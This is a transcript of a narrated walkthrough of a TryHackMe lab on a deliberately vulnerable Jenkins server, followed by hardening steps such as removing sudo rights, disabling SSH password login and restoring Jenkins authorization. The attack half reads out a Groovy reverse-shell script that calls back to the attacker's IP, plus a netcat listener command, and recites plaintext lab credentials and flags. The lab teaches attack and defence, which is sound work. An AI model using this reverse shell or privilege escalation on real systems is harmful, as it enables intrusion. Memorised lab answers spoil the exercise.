Hallo Freunde, hello friends. Ich bin begeistert. I'm looking forward to it. This is day. What are we at? This point? Why do I speak German anyway? Like I've been watching German content all day and it's just sort of stuck in my head now. Task 18, day 12. Defense in depth. Slaying threats one layer at a time. So I'm gonna start the machine. At least I'm gonna start the attack box first, and then I'm gonna start the machine. One thing you may notice is that the NVDA speech window is gone for this one. We're gonna do a lot of command lining today, and I have been told that, at least not on these videos, but it can happen that the NVDA speech window covers up the command line window. So I'm going to just err at the side of caution and make sure we don't even have it in the window. So sorry for people who think that's helpful. I can, in good conscience, have it on for this particular one because we're going to do this is going to mostly be command line stuff, and I don't want the entire video to not have the important deets showing. And unfortunately, as a blind content creator, there's no real way I can verify if that's happening or not. Another change we'll see is that I'm using Windows Terminal for this one because we have several command line windows we're going to be needing. So it'd be getting really annoying if I have to keep switching the OBS focus around a bunch, so I'm not going to be doing that. I'm going to just have it in different tabs, and we can just cycle in between. So that's fine. That's perfectly okay. Apart from that, it's the same old, same old. I haven't looked really at this task yet. This is, I really quickly glanced at what we were doing, and I saw there was a Leroy Jenkins server, and it was a bunch of SSHing that we're doing, so I'm not sure if we're going to make it today. I don't foresee any accessibility issues. Shouldn't be any, because this is just command line work, but you never know, so we'll have to see how we do. I'll have to back off on the microphone a little bit, because I think I'm clipping it a tiny bit. Just sit here, give you a bit more room, but that's okay. Let's see, what's the key for our attack box? 1010 148 43. Let's copy that really quickly. Ooh. Alright, got the IP, need the root password for it though. Let's see, is it showing down here? It's not. Oh, it is actually. Let's see. Here's the attack box password. We'll just grab that and put that in my little notebook. Whoops. Whoosh. Can close this out and also dismiss this because we don't really need this to be showing on the screen. I don't think we'll be needing it. There. Get rid of this. Hello. Yes, you may use the keyboard. You must use the clipboard. Jeez. All right. Let's see. Dismiss was the third icon. Yeah, there we go. Goodbye. I will start the machine. Then as the machine is starting up, I can start reading the stuffs. There's a lot of it. Here we go. Like I said, task 18, day 12, defense in depth. Slaying threads one layer at a time. We currently have our Chrome showing on the videos, and that's fine, because that's what we really need to see for this bit. The story. Task banner for day 12. We do not get to know what's on it. That's just the alt text for it. Defense in depth. With the chaos of the recent merger, the company's security landscape has turned into the Wild West. Servers and endpoints, once considered fortresses, now resemble neglected outposts on the frontier, vulnerable to any attacker. Report... As McHoneybell sifts through the reports, a sense of urgency gnaws at her. This is a ticking time bomb, she mutters to herself. I should have gotten a little elf voice for that. Oh well. It's clear they need a strategy, and fast. Determined, McHoneybell rises from her chair, her mind racing with possibilities. Time to suit up, team. We're going deep, she declares, her tone a blend of resolve and excitement. Defense in depth isn't just a strategy, it's our lifeline. We're going to fortify every layer, from the physical servers in the basement to the cloud floating above us. Every byte, every bit. In this task, we will be hopping into McHoneybell's shoes and exploring how the defense in-depth strategy can help strengthen the environment's overall security posture. Learning objectives. Basic endpoint hardening. Simple boot to root methodology. I don't know, I really like this. This seems like a well set up task so far. Let's see how we do. I'm gonna move this a little bit. There we go. Server information and connection instructions. Before moving forward, review the questions in the connection card shown below. Day 12, what should I do today? Connection card details, start the attack box and the target machine. A split screen view iframe is available for the target, and credentials are provided for RDP, VNC, or SSH directly into the machine. In this case, that's SSH, which makes me very happy, because that is actually something we can do just fine. Without any bullshit, no audio or no NVDA or anything of the sort getting in the way this time. So this should be a smooth sailing, just like day 10 was. The machine we'll be playing around with is a vulnerable by design Ubuntu running a Jenkins server service. It has been configured for ease of use, allowing flexibility for users in exchange for security. Before we get started, we need to boot up 2 machines, one for the attacker and one for the server administrator. Click the green Start Machine button in the upper right section of the task. We've already done that. Give the machine 3-4 minutes to boot. This will serve as the server admin points of view, and we will be implementing some hardening best practices from this machine. For the attacker's perspective, it's recommended that you use the attack box. You can do this by pressing the blue Start Attack Box button in the top right section of the page. A split screen feature should appear on the right side of the page. If you're not seeing the in-browser screen boot up, use the Show Splits View button at the top right of this page. I don't want to because I've already done that. Log into the admin account via SSH using the credentials supplied below. You can do this in the attack box by opening a new terminal and entering the command SSH blah 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 blah. We will not be doing that. We will actually be making 2 tabs, one for the attack box and one for the defense box, as it were. So this is admin at 10.10.174.105. Let's start with that one. I'm not going to switch to the command line just yet. We'll do that in a minute when we're actually going to start doing things to these servers. And from that point onwards, I will probably focus on the command line more often than not, because I'm just reading the text out loud anyway, and there's not much happening on the page, so it's just easier to do it that way. I'm going to log into this. We should have VPN access. Uh-oh, we may not.
PSC user floor blank. PSC user floor greater SSH admin at 10.1.
Oh, that would not work.
PSC S8 space S8 space HSS space. The authenticity of host 10.10.
There it goes.
Warning, permanently added 10.
What's the password?
TryHackMe at terminal graphic clickable THM key. Terminal attack box bio username admin. Pass super strong password 123.
Yeah, just
super strong
that.
Window. Paste. Welcome to Ubuntu 22.04.3 LTS. /Linux.
Why, thank you. We'll make a new tab here.
Windows PowerShell.
And we will also log into root at
star 10.10.148.43. Star
that.
10. Windows PowerShell. Paste 10. The authenticity of host 10.10.
Yep.
Warning, permanently added.
Okay.
Start 8,034,8. 8 million. Windows. Paste. System information as of Tuesday.
See, this is how fast things can go if things are accessible. I'm just logged into 2 shells here. I'm going to read the text until we actually start doing things on the shells, and then we'll start keep going. But I set up the connections. They're fine. They're working, so we're good to go there. Connecting to the TryHackMe VPN via OpenVPN works great too in your local Linux-based machine. You can do this by downloading your OpenVPN configuration file from your Access page. Click your profile in the upper right corner of the page, then select Access. Well, the Access page is also a link. It's just tryhackme.com/access, so it's not that hard to find. Next, go to the location of the configuration file and enter the command sudo openvpn filename.ovpn. You'll know that both machines are ready when you see a desktop in the attack box and you're able to connect via SSH to the server. If you're using the OpenVPN option, you can ping the server's IP to check your connection. Guided walkthrough of the attack chain. As discussed earlier, we're dealing with a server that is vulnerable by design. It contains misconfigurations and has been implemented with poor or simply non-existent security practices. This part of the task will walk you through one of the many ways we can get elevated privileges to this server. Skipping the enumeration part, we can access Jenkins via Firefox on its default port 10.10.175.8080. You should be greeted by a page that looks something like this. Jenkins homepage as the alt text. Well, we'll just go look at it because we don't get to have a description of what that means. Okay, we'll just open this in the new tab here. Hello? Oh, it's just a bit slow, but there it is. Jenkins. There it is. Oh, the accessibility of this is also kind of wonderful. Loads of unlabeled things, very nice. New item, we have a button that has nothing on it. Anything on headings? Nope, no headings, of course not. Alright, well, good. We're logged in any case. You should be greeted by the homepage. Yes, we are. Okay, good. Getting a web shell, okay. We instantly gain access to the general workings of Jenkins. Explore the features that we can play with, and you'll see that there's a way to execute arbitrary scripts for administrating/troubleshooting/diagnostic purposes. On checking this further, you'll see this can be used to spawn a web shell. Click on the Manage Jenkins button on the left side of the page. Scroll to the bottom and you'll see the option we want, Script Console. Okay, let's see, Manage. Oh, that's not called Manage. Beautiful. Oh, there it is. Manage Jenkins. Whoops. Okay, we are in the Manage Jenkins. Oh, at least that has a heading. Nice. Scroll down. There should be a script console. Where's the script console? System, tools, plugins, nodes, cloud, security, credentials, credential provider, system information, system log, load statistics, about Jenkins, manage all data, reload configuration from disk, blah blah blah, script console. There it is. All right. And yeah, here we have a multi-line. Here we have a multi-line web shell. It says, script console. Type in arbitrary Groovy script and execute it on the server. Useful for troubleshooting and diagnostics. Use the print command to see the output. If you use system.out, it will go to the server's std.out, which is harder to see. Example, println jenkins.instance.pluginmanager.plugins. All the classes from all the plugins are visible. Jenkins.star, Jenkins.model.star, Hudson.star, and Hudson.models.star are pre-imported, rather. Well, I don't speak Groovy, so I hope it's going to tell us how we do this. Let's see. Script Console is a feature that accepts Groovy, a type of programming language for the Java platform. You have heard of it, but never played with it. Let's jump straight in and try to establish a reverse shell using this feature. The example below is using an edited version of this script. Okay. Groovy reverse shell script. All right, here we go. String host equals attacking machine IP here. All right. Int port equals 6996. String cmd equals /bin/bash. Process p equals new process builder. Bracket cmd bracket dot redirect error stream bracket true bracket dot start bracket bracket semicolon socket s equals new socket bracket host comma port bracket input stream, yeah, the whole 9 yards basically. I'm gonna read this entire script out loud. We have computers to do that for us. Copy the script above and paste it into the script console text box. Remember to change the host value to your attacking machine's IP. Open a new terminal and set up a netcat listener using this command. And see, here it is again, NVLP 6996. Let's go do that real quick. At this point, I think I'm going to switch the OBS focus as well to the command line here. So let me just really quickly go do that. Screencasts, properties. Where are you? Windows terminal.exe. There it is. Whoosh. All right. Now, the big question, which one's is which? This is root, this is not root. So it's probably this one that we need to do this. Be doing this on. Here we go. We'll do NC, what was it? LNVP 6996. Okay. Floop. That's listening. Now we're going to grab this whole entire script that's here on the page that we just looked at. Okay, blah, blah, blah. Okay. I copy that to a notepad window first because we need to put in our IP address. There we go. The IP address goes here in the attacking machine IP address here. We're going to remove this bit. So there we go. Find that IP again. We have it in our notes. It's right up here. 10.10.148.43. I'm gonna put that in here. Gonna paste it. Gonna copy all of that into the script console here, and I just pasted it in. And we're going to, as I thought, unfortunately the script console uses an inaccessible code editor. That's not on TryHackMe though, that's just a Jenkins thing. And run. Did we get a shell, I wonder? Or did I do it wrong? Connection from 10.10.174.105.53.106 received. Very good. So what, I can now... Oh, I can now do a command? Let's try command. Oh, look at that. We have access. We can do fancy stuff. We have a shell. First shell of the day. Probably going to be more today. We'll see. Copy the script above and paste it into the script console text box. Remember to change the... Yeah, we did that. Open a new terminal. We did that too. Once both the reverse shell script and the netcat listener are ready, you can press the run button. I did. You should see an established connection in your attacking terminal, and you can test the shell by sending some typical Linux commands, such as id and who am I. I did ls, but that works. A successful connection would look something like this. Yep, here we have a thing. Little bit of shell output that shows pretty much what we just saw. Getting the Tracy user and root. Now that we have a web shell with the Jenkins user, we can explore the server's contents for things that we can use to improve our shell and perhaps elevate our privileges. Check the usual folders and you'll be able to find an interesting bash script file in the opt scripts folder named backup.sh. Okay. Same comment as I had yesterday. People who are just new to this aren't going to know what the usual folders are. I have a bit of a problem with that, but apart from that, okay, fair enough. Check the contents of the file, you'll find a simple implementation of backing up the essential components of Jenkins and then sending it to the folder home Tracy backups via SCP. The file also contains the credentials of the user Tracy. The SCP command is a clue that SSH may be used on the server. If so, we can use it to upgrade our user and shell. Open a new terminal and log in via SSH using the command SSH Tracy at 10.10.174.105. Enter the password when prompted, and you will be logged into the Tracy account. Well, we don't have that file yet. We don't have the password. So let's go find the password, because we apparently need it. So let's go to /opt. Scripts. So we'll turn complete speech on. There. Let's see. ls.
Backup.sh.
Yep, there's backup. Can I have a cat, please? Yeah.
Number /bin/sh. mcdir/var/lib/jenkins/backup. mcdir/var/lib/jenkins/backup/job/var/lib/jenkins/backup/node/var/lib/jenkins/backup/plugin/var.
Yeah, okay, blah.
rmrf/var/blank/bin/sleep10 $$, scp/var/lib/jenkins/backup.tar.gz $username $ib/home/tracy/backups. ib equals localhost. Password equals 13 1 and 33.
13 1 and 33.
ASSOORD equals quote 1.
Going to copy this
Start
bit
marked.
out.
3 line 1 and line 3 quote 13 1 and 33.
Okay, we have the password. Let's copy that into our little
Star string post star 10
notepad.
star string post equal.
Don't need this
Blank.
anymore. There.
Paste 13 1 and 33.
Alright,
Quote
so
13 1 and 33. Copy.
let us do
Speech mode
exactly
off.
what the thing says and make yet another new tab. I was in PowerShell, that's my default thing apparently. That's kind of interesting, but okay. SSH Tracy at 10 dot 10 dot, what was it? 140 something. 174.105. Okay. 174.105. It's going to complain. Huh?
Speed SSPSC use SSH could not resolve hostname Tracy.10.10.1 PSC
Oh,
use
my bad.
5.0.1.0.1.1
That should be an @ sign.
Tracy at 10.10.174.105 as password. Star 13 1 and 30 start.
That is
13 1 and 33. 13 1 and 33 unselected.
13-1N_33. Is that
13
like a
13 1
lead speak
Windows.
thing or just weird?
Paste. Welcome to Ubuntu 20.
Hello, we are now Tracy. There we go. That was
Speech mode
helpful.
off.
Let's see what else we need to do on this. Enter the password when prompted and you will be logged into the Tracy account. Yes, we are. Finally, we can use sudo-l to find out what commands the user is permitted to perform using sudo. Okay, let's see what those commands are. Sudo-l.
Sudo password for Tracy.
This again,
Paste.
I guess.
Matching default entries for Tracy on Jenkins and reset mail backpass secure path equals //local all. User Tracy may run the following commands on Jenkins. All.
Okay, that looks good.
User blank. And reset mail backpass secure path equals.
And reset mail bat pass secure path / user local sbin. Okay.
Matching default entries for Tracy on Jenkins. Sudo password for Tracy.
All right. Yep.
TryHackMe.
Looks good. We have some
Speech mode off.
interesting credentials here. Yeah, we see a screen print of what that would look like. Redacted. Okay, we see that same thing with the redacted thing. User Tracy may run the following command on Jenkins. Blah blah blah. The OOO line in the output essentially says that all commands can be performed by Tracy using sudo. This means that the user is created with an inherently privileged access. As such, we can just enter the command sudo su and we're root. Defense in depth and its role in hardening. From the attacking point of view, we were able to get straightforward root access to the server. This is bad news for defenders, since the goal is to make it as hard for the attackers as possible to get what they want. In the next section of this task, we will establish defensive layers that aim to work together, with each layer making it more complicated for the attackers to achieve their aims. Defense in depth is all about creating defensible environments, whereby security controls are meant to deter the bad actors from achieving their main goal. Notice that the emphasis isn't on never getting compromised. Rather, it's on making sure that the bad actors don't succeed. This way, even if one or more defensive layers get bypassed, the stacking alone of these layers makes it much harder for the bad actors. Sometimes this is actually enough for bad actors to try and minimize their losses and move on to easier targets. Essentially, what's funny is that from an attacker's perspective, what you hear often in the criminal circles is make yourself too much of a problem to go after by being hard to detect. That's often what I see on like sort of fictional hacker stories and things. Even on the darknet, this is sometimes being bandied about. So it's kind of interesting that they Use a very similar kind of thinking about it. Guided hardening of the server. Going back to our attack exercise from earlier, we discovered that root is very easy to achieve because there is full trust within the server environment. Removal of Tracy from the sudo group. We should always follow the principle of least privilege, especially for systems in production. In this example, the user Tracy is made in such a way that it has the same permissions as the admin. This gives the user more flexibility. However, it also runs the risk of misuse, not only by the owner of the account, but also by others who gain access to this account, as we did. To remove Tracy from the sudo group, we use the following command: sudo del user tracy sudo. Okay. I guess we'll do that now. Sudo del... Actually, let's not do that yet. We might still need this account later. To confirm removal from the sudo group, use sudo l-u tracy. Okay, we're supposed to be doing it. Oh, we are supposed to be doing it from admin@Jenkins. Okay. So not from this account, but from this one. Sudo del user tracy sudo. And it says...
Removing user Tracy from group sudo. Done. Speech mode off.
Essentially, it says that we have done it. All right, that's good. Yeah, removing, done. Sudo lu tracy. User Tracy is not allowed to run sudo commands on Jenkins. Okay. I'll just believe that it says that. Changes to the Tracy account won't affect current active sessions, so we can test them by logging in and again as Tracy on the new terminal on our attacking machine. Not going to do that, I'll believe that it's true. That change alone made all the difference between achieving root and staying with the user Tracy. Now the attacker is left with 3 immediate options. Further enumerate the server for a possible route to root within the user Tracy. Find a way to move laterally within the system to a user with a possible route to root access, or find a different target, hardening SSH. The path to root has been made more complicated for the attacker, but that doesn't mean we should stop here. Attackers can be very creative in finding all sorts of ways to accomplish privilege escalation. Any additional layers will make it a lot harder for the bad actors to achieve their objectives. Remember that as attackers, we were able to use SSH in this server to move laterally from a lower level user. In light of this, we can disable password-based SSH login so we can thwart the possibility of an SSH login via compromised plaintext credentials that are just lying around. In the admin shell, go to the /etc/ I don't think that's actually etc. It's like something config, but we'll just call it etc to not be ambiguous. /etc/ssh/hd_config file and edit it using your favorite text editor. Remember to use sudo. Find the line that says number password authentication yes and change it to password authentication no. Remove the number sign and change yes to no. Next, find the line that says include /etc/config_d/.conf and change it to number include. Add a number sign at the beginning. Okay. Save the file, then enter the command sudo systemctl restart ssh. In the example below, the egrab command shows what the lines within the file should look like. You can use the same command to see if you have successfully edited the file. You should see the effect immediately when you log out of this Tracy in your attacking machine and try logging in again via SSH. It won't work. Okay, yeah, well, again, we can go do that real quick. Why not? Etc. SSH. Nano SSH config. Sounds kind of like this.
Number is the SSH number, SSH number users, and number blank. Number configuration data is number 1, number 2. User specific number list of number SS blank. Include /etc/ssh/ssh config.d/star.com.
Well, we were supposed to number that out, make that into a comment, so we will.
Star number blank host star. number TS number forward number password authentication yes.
You're supposed to remove this number sign and then at the end of this
Space.
line change yes
S-E-Y.
to no. Okay, we've done that. We'll save
Modify
this.
buffer yes NOC
I
cancel.
think I forgot sudo.
File name to write SS error writing SSH conflict.
Yep, I forgot sudo.
Save modified buffer Windows PowerShell copyright C admin eject.
So we'll do this again. Sudo.
New 6.2 SS number is the number list of available blank host number include slash etc star number.
Just do it really
host
quickly.
number forward number password authentic space number space.
As for how I'm doing it so quickly without actually listening to what screenreader is saying, that has to do with the fact that I can use Braille to cheat. That's also how I'm reading all these texts out without having the screenreader yammering our ears the entire time through it. Okay, we'll just save this real quick. Now it went perfectly. There we go. Was it sudo system control restart SSH?
Speech admin Jenkins slash etc slash ss admin Jenkins slash etc slash ssh dollar sudo system restart SSH admin Jenkins.
We get no
TryHackMe advent
output whatsoever about that, so no error messages is good news. We're good. Yep, those lines are fine now. We're good to go. Example of a successful, yeah, okay, we've done that. Blah, blah, blah. More screen prints of how it actually works. It's worth noting that applying this hardening step assumes that there are other ways for users to log into the system, admin account included, and it usually involves the setup of passwordless SSH login. However, for our purposes, we can opt not to do that anymore. Stronger password policies. Another pivot point emphasized in our attack exercise earlier was the plaintext password discovery that led to the SSH access to a higher privileged user. Two immediate things are apparent here. 1. The password is weak and may be susceptible to a brute force attack. And 2. The user employed a bad password practice. A bad practice. The user employed bad password practices, putting plain text credentials on a script and leaving it lying around for anyone with server access to see. That was too many B's and P's in a row. Alright, here we go. We can apply a stronger password policy, requiring the user to change their password and make it compliant on their next login. However, it's solely up to the user to prevent bad password credentials. Despite following a strong password policy, it's solely up to the user to prevent bad password practices. My bad. Further, plain text credentials, despite following a strong password policy, may still be used to move laterally with the web shell access that we got initially. Care really should be exercised when dealing with secrets, especially ones that belong to highly privileged accounts. Promoting zero trust. Once we've applied all of the hardening steps discussed, you'll notice that we're able to patch many of the vulnerabilities that we initially exploited to get to root, in terms of the attack methodology discussed earlier, at least. We're back in the web shell that served as our initial foothold in the system, and it's accessible as a result of a Jenkins implementation that assumes full trust within the environment. As such, it's fitting that the last hardening step we'll apply in the server is one that promotes zero trust. Instead of opening up the Jenkins of the opening the workings of the platform to everyone in the environment, this change will allow just those who have access to the platform. Okay. In the admin terminal, proceed to Jenkins' home directory using the command cd/var/lib/Jenkins. Okay. cd/var/lib/Jenkins. Here you will see two versions of the Jenkins config file, config.xml and config.xml.bak. Fortunately for us, the administrator kept a backup of the original configuration file before implementing the current one. As such, it would be more straightforward for us to revert it back to the original by removing the comments in the XML file. For reference, the comment syntax is signified by exclamation dash dash right after the opening bracket and dash dash right before the closing bracket. Kind of like HTML, yeah. Anything in between is commented out. Using your favorite text editor, access config.xml.bak and look for the following block of lines. Okay, let's go find that file first and foremost. Sudo nano config.xml.bak, there it is. And we're looking for the block of text that starts with authorization strategy. Okay.
Speech mode, speech, less version greater, less num exec, less mode great, less use secure, less authorization strategy, class equal.
Here it is. Class equals Hudson.security, blah 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 blah.
TryHackMe
What are we supposed to do?
Speech mode off.
Remove the comments for both authorization strategy and security realm, then save the file. We can then remove the current active config file, or after that we can copy the backup file to make a new config back from the XML. Restart the service, so just once that's done, you'll see that unlike before, okay, so we need to remove the comments around these two blocks here. We'll do that real quick. And then once we've done that, we need to restart the server, the service on this server. Service server, all the same deal. Okay, so we're removing. Oh, I can't click around with the mouse in this. There we go. There.
Speech less authorization, less deny anonymous read access greater, true, less slash deny anonymous read access greater. Less slash authorization strategy greater.
Okay. And then we scroll to the end of the line here, remove the two dashes, and we'll do the same thing for the other one.
Less full trust has N0 place 1 NS3 cur 1 tie greater.
Full trust has N0 place. Oh, that's a flag, I think. That looks like a flag. Let's copy that line. That looks like a flag.
Start marked. U. S3CUR1TY dash dash. Greater dash dash Y dash. Full trust has N0 place 1 NS3 cur 1 tie. TryHackMe at star 13 1 and star 13.
Yeah, that looks like a flag. We might need that for the question.
Full trust has N0 place 1
copy that
NS3
out
cur
while
1
we're
tie.
here.
Dash.
I'm assuming we don't copy out the actual comment marks. I'll leave this comment in though.
Less full trust has N0 place 1 and space. Space.
Here.
Space less dash dash dash.
This is security realm. We also need to make sure we uncomment that bit. So we'll do this.
Dash bang. Less disable signal greater true, less slash disable signal greater, less enable captcha greater false, less slash enable captcha greater, less slash security realm greater.
Go to the end of this line, Control E.
Greater.
Backspace to remove this bit, then we close this file out and save it.
Buffer, yes, NOC and file, Windows PowerShell, copyright, C, Microsoft.
And we're saved. Very good. Now we have to restart the service. Let me quickly check what the actual service name is. We first have to change the actual, hang on. We first need to remove the current file. What is it? What is the file name of this thing? Config XML. So what we need to do here is we delete config.xml without the BAK. There we go. What?
Speech admin Jenkins /rm remove right protected regular file config.xml.
Well, yes. Yes, remove it, please.
RM cannot remove config.xml. Permission denied. Admin Jenkins.
Watch me.
Admin Jenkins /var/lib/Jenkins $.
Thank you. Okay.
Speech mode off.
So now we make just a copy of this config.xml.bak to just config.xml. There we go. And finally, we need to restart the service. It's just called Jenkins. Okay, so that would be sudo systemctl restart Jenkins. That takes significantly longer than the last thing.
Speech bottom blank admin Jenkins /var/lib/Jenkins $sudo system restart Jenkins admin Jenkins /var/lib/Jenkins $. Speech mode
okay,
off.
good. We're all done. Excellent. Restart Jenkins. Once it's done, you'll see that unlike before, the inner workings of Jenkins are not accessible. It should be noted here that fresh installs of Jenkins feature a login page by default. Okay, let's go refresh this page. It'll probably give us an error. I want to continue, yes. HTTP error 403, no valid CRUD was in... What? Oh, crumb. No valid crumb was included in the request. What the hell is a crumb? Why do... Okay, little tangent here, but why do developers in frameworks always need to give things like their own little names for things? What's a crumb? Is it a cookie? Like a mini cookie? Alright. We have an example of how we were supposed to be doing this, but I'm pretty sure we did it right. New Jenkins homepage. Yeah. Conclusion. Defensive layers don't need to be flashy. You can accomplish a lot with one-liners and simple implementations of security best practices. This is exactly what we have done throughout this task, addressing a specific exploitable vulnerability each time. This task is a simple demonstration of how it works in the real world. Each hardening step adds a defensive layer, and these layers work together to make a more defensible environment. Exploit 1 or 2, and you're still relatively defensible. That's because the next layer is there to make it harder for the bad actors to succeed in getting what they want. Defense in depth doesn't stop here, though. The next step is setting up tools and sensors that would give you defensive teams visibility over your environment, the output of which can be used to create automated detection mechanisms for suspicious behavior. But that's a discussion for another time. Epilogue. Great work, team, says McHoneybell, her eyes gleaming with pride. We've laid down the foundations of a robust defense. But remember, this is just the beginning. The cyber world is ever evolving, and so must we. Stay sharp, stay curious. The team nods, a sense of accomplishment and readiness evident in their postures. They are no longer just reacting, they are anticipating, ready to tackle whatever challenges lay ahead in the ever-changing cyber terrain. McHoneybell grabs her jacket, her thoughts already on the next challenge. Tomorrow, we rise again. For now, rest well, team. You've earned it. That was fun. That was a lot of reading, though. Answer the questions below. What is the default port for Jenkins? That would be 8080. 8080. Is that the right answer? It is. Very nice. What is the password of the user Tracy? That was that weird 13 in 33 thing. 13, 1 and 33. I'm trying to think. 1, 3 would be Le or Lee. I don't think it's an actual like lead speak thing. I don't understand what it was supposed to be meaning if that's what it was. 1N could be in and EE could be 33 could be EE, I guess, but then still doesn't make any sense. That's the correct answer. So it's 1 3 underscore 1 N underscore 33.
Speech 3 1 3 line 1 and line 3 3. Speech mode off.
1 N 3 3. Yeah, okay. What's the next one? What's the root flag? I'm assuming that's the thing we found earlier. Oh, we never did root, did we? Shit. I hope this is the right one. Because if it isn't, we missed one. It's not. Okay. What is the error message when you log in as Tracy again and try to sudo v after its removal from the sudoers group? Oh. What's the SSH flag? What? Oh, that's this one. Huh? Huh?
Speech mode beep. Speech mode talk. Button submit. Answer format. 26 star edit full trust as N0 place 1 NS3 per 1 type.
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13.
Button in. What's the answer format? What's the link Jenkins flag? Answer format. 32 button submit. Answer format.
What?
Answer form. Paste. Y. Flag. Button submit. Yes.
Oh, okay. Yeah, that's that one. We missed a couple flags, gents. We have to restart the machine. There's a couple things we did not do. So I'm gonna have to terminate the machine and undo all our hard work hardening it. Give me just a moment here to go do that. Let's see. Well, now we're terminate the machine. Bang. Goodbye. We have to start it up again. Start the machine. Bang. Yeah, we missed a couple flags. That's interesting. I didn't even go think to look for them as we were doing the thing. Usually there's like 1 or 2, but there's like 3 in this one. And I missed the SSH one. I looked at that file. I didn't see it. That's kind of bad. Okay, we're just waiting for that to come back up here. I like this task. This is a fun one. There's a couple of interesting things that you get to see here. Defense in depth, and you also get to be the attacker. So there's like a little bit of everything for here. A little bit of defense for the defense-like types. A little bit of attacking for the red teamers. I like how this was done. This was fun. All right. Let's see. Is this coming up? No, not yet. All right. I'll have to show the split screen again, I think. Oh, we'll just wait for it to populate and then we'll... admin at... We have a machine IP yet? We do. 10.147.61. Alright, let's try this again. Yeah. So we need to copy this bit. Here we go. Yeah, we got disconnected from this one. That makes sense. Oh. Bang. All right. Yes. What was this super strong password or something silly like that? Yeah, here it is. Super strong password 123. Just gonna copy that in. Bang. There we are. Huh? I'm pretty sure that's the password. Ah, there it goes. Okay, beautiful. So the SSH flag, I think we can just find by looking at the file. So let's go do that. SSH. Here we are.
Speed bash admin Jenkins bash cd etc /ssh. No such file or directory. Admin Jenkins stop. Admin Jenkins /$. S.
Let me find it.
Run dialog. Full. TryHackMe. Find speech mode beeps. Speech mode blank. Speech mode off.
Stop talking. There we go. /etc /SSH/SSD config. Wait, why is that not there? What the hell? What? Ah, there it is. Okay. That was strange. Did I mistype it earlier? Oh, okay. I forgot a slash. Yeah, makes sense. I'm dumb. All right, let's go look at this SSHD config again. Because I'm assuming there's going to be a flag in there that we completely missed.
Number SSHD config 5 blank. Number is SSHD was compiled with blank. Number is strategy used for options in the default SSH. Number open SSH. Number possible. Number default value blank. Include /etc /SSH/SSHD config.d/star.com blank. Number port 22. Number address family any. Number listen address 0.0. Number listen address blank. Number host key /etc /SSH. Number host key number host key blank. Number ciphers and keying. Number rekey blank. Number login. Number site. Number log left blank. Number authentication blank. Number login increase time 2M. Number permit root login prohibit password. Number strict mode yes. Number max off try 6. Number max sessions 10 blank. Number pub key authentication blank. Number expect.s. Number authorized key blank. Number authorized principal blank. Number authorized number blank. Number for this to work you will also need host keys and slash. Number host based number host based number ignore user known. Number don't read the user slash dot. Number ignore host yet blank. Number to disable tunnel clear text. Number password authent. Number need 3D2 secure th1 secure sh31l. Number need 3D2 secure th1 secure sh31l.
All right.
N E3D2 secure th1 ESH31L space. No start marker set.
If you're wondering what that higher pitch thing is that keeps happening, that is a capital letter indicator.
Start marked E3 SECURE ESH31L space. D3D2 secure
Okay, that's one flag.
TryHackMe advent of site.
Let's fill that one in here.
No previous answer format. 4-star edit button on the what is the password of the user Tracy. Answer for button on what's the root flag. Answer format. 16-star edit full trust.
The root flag we
Answer
don't
full
have
trust plan
yet. We'll
unselected.
get that one in a
Buttons button
second.
in. What is the error message when you log in as Tracy to the answer
We
form?
don't have that yet either.
Button what's the link SSH flag.
We
Answer
do have
format.
the SSH flag.
And full blank. Paste NE3 TryHackMe
There
advent
we
of
go. The SSH
What's the link SSH
flag
flag? Answer form.
is NE3D2S. Okay, yeah.
E.
Do this in capital N E3D2 capital S E C U R E capital TH1 S S small s capital S E C U R E S H 31 L, and the S last S is also capitalized. Essentially, it spells out need to secure this secure shell in LeetSpeak. Okay.
Button
We
unavailable.
have that one.
Button hint. What's the link Jenkins flag?
We have the
Answer
Jenkins
format.
flag already, so now we
Button
just need to
hint.
do
If you enjoyed this room.
a couple of these root things that we did not do. We need to get our attack box
Admin of Jenkins slash etc slash admin tab
ready
switcher
to
grouping list.
go
Root 10
again.
10 Windows power.
What are we doing here? What is this?
Root 10 10 148 40 RMRF slash var slash lib slash RM root
Yeah, that's the script thing. Yeah, I don't think this is gonna work anymore.
CTF builder desktop downloads and
Oh, it is. Look at that. Okay. The CTF builder is on here. Fun. This is the attack box. We
root
need
10 10 140 root 10 10 100
get our shell back. So I'm
Listening
going
on
to really
0.0.
quickly do that again.
Speech mode off.
Oh, so much for saying we don't need this anymore with them. Is Jenkins still there? Yeah. Okay, we can refresh this page. We should be able to get the access to it again. We are. Can we also see the actual page? Uh-oh. Why is that still
Speech
saying we
mode close
can't
button.
access it?
Error 403 no valid crumb was included in the request tab select.
Go back. Oh, it's a different
Try
IP, right? Of course.
Jenkins link. Button hint.
Okay, let me go back up here.
Correct answer submit hint button. Submit correct answer start terminate add 1 hour button term start wish the story. Jenkins link. SSH link. VPN link. Access link. SSH link. Jenkins link. Jenkins link. Jenkins link. Script link. Platform. Let's jump straight in and try to establish a reverse shell using this feature. Script C click disk administration with and you'll see instantly gain access.
I'll just go to the machine IP. What is the
Speech
machine
mode off.
IP again? Let's see. No, not that one. Yeah, that one. We can close this. We don't need this anymore. Let me just keep. Yeah, let's just leave this open. Actually, we don't even need to do the whole Jenkins thing. We can just log in as Tracy because we have their login details. So we'll just do that. It's faster. We'll use this one. So SSH Tracy at what's the IP? And 1010 147 61. So we'll grab that. I don't think that's correct. Hang on. 80. I'll just scroll here. 1010. Okay, it was correct. Okay, good enough. There we go. I just need to see the last bits here. So we're going to go log into this guy's account. Password is this thing. Just gonna quickly paste that in here. Boop. And we can do sudo su to get the root flag. At least I'm assuming that's what we'll get.
Speak sudo Tracy at Jenkins $sudo root at Jenkins /home /Tracy number. Backups root at Jenkins /home backups.
Where is the root flag?
Root at Jenkins. Backup.tar.gz. Root at Jenkins /home /Tracy /backups number. Root at Jenkins number. Flag.txt snap. Root at
There it is.
flag.txt snap.
Okay. What's the flag?
Cat flag.txt. No such file or directory. Root at Jenkins. At S0T West 1 without ID. S0T West 1.
Easy root without DID.
Root at SOZE.
Copy that
Start
out.
marked Z-R-O-0-T W-1-T-H-O-U-T-D-I-D space.
There. No, I don't have to read it out loud.
Speech mode off.
